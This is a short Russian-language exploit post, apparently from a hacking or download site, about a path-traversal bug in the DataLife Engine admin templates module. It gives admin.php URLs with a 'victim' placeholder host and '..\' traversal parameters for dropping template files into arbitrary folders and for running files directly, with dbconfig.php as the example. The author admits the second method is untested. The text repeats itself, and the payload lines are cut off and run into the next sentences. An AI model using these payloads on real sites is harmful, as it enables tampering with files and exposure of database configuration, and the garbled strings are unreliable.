Скачать Баг - прямой вызов файлов и мусор в папках
Баг - прямой вызов файлов и мусор в папках
Данный баг позволяет производить прямой запуск файлов и мусорить в папках
DataLife Engine уязвимость работает на версиях: ВСЕ DataLife Engine
Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)
Автор: Lion__
Переходим по ссылке:
http://жертва/admin.php?mod=templates
Получаем юрл с хешем, дописываем:
Если вам надо расподить файлы шаблона в нужную папку:
Прямой запуск файлов (пример запуска dbconfig.php):
Внимание: Второй способ не тестировался, но должен работать, защиту вроде обходит
Данный баг позволяет производить прямой запуск файлов и мусорить в папках
DataLife Engine уязвимость работает на версиях: ВСЕ DataLife Engine
Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)
Автор: Lion__
Переходим по ссылке:
http://жертва/admin.php?mod=templates
Получаем юрл с хешем, дописываем:
Если вам надо расподить файлы шаблона в нужную папку:
&action=dosavetemplates&edit_main=Bag_By_Lion__&do_template=..\Прямой запуск файлов (пример запуска dbconfig.php):
&action=dosavetemplates&do_template=..\engine/data/dbconfig.phP -a=Внимание: Второй способ не тестировался, но должен работать, защиту вроде обходит
